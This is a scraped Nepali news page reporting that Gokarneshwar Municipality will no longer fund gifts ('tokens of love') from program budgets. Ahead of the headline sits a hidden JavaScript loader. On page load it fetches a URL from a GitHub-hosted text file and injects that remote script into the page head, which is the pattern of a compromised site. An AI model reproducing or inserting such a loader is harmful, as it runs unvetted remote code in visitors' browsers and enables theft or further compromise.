;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गोकर्णेश्वर नगरपालिकाको खर्चमा मायाको चिनो दिन नपाइने निर्णय – जुनेली न्युज
बुधबार, असार १२, २०८२
  • होमपेज
  • गोकर्णेश्वर नगरपालिकाको खर्चमा मायाको चिनो दिन नपाइने निर्णय
Breaking News

गोकर्णेश्वर नगरपालिकाको खर्चमा मायाको चिनो दिन नपाइने निर्णय

जुनेली न्यूज, काठमाडौं।

गोकर्णेश्वर नगरपालिका बाट विभिन्न कार्यक्रमको लागि लगिएको बजेटबाट मायाको चिनो दिन नपाउने निर्णय भएको छ ।

नगरपालिकाबाट कार्यक्रम संचालन गर्दा आवश्यक खर्च कटौती गर्ने नीति अनुरुप यस गोकर्णेश्वर नगरपालिका सँग सम्झौता गरी नगरपालिकाको बजेटबाट सञ्चालन हुने जुनसुकै कार्यक्रममा  मायाको चिनो token of love सम्बन्धित खर्च समावेश नगर्न सम्बन्धित सबैमा सुचित गराईन्छ भनिएको छ । साथै कार्यक्रम फर्छुट गर्दा सो सम्बन्धि बिल समवेश गरिएको पाइएमा कार्यक्रम रकम नदिने  व्यहोरा समेत जानकारी गराएको भन्दै नगरपालिकाले सूचना निकालेको छ।

फेसबुक प्रतिक्रियाहरु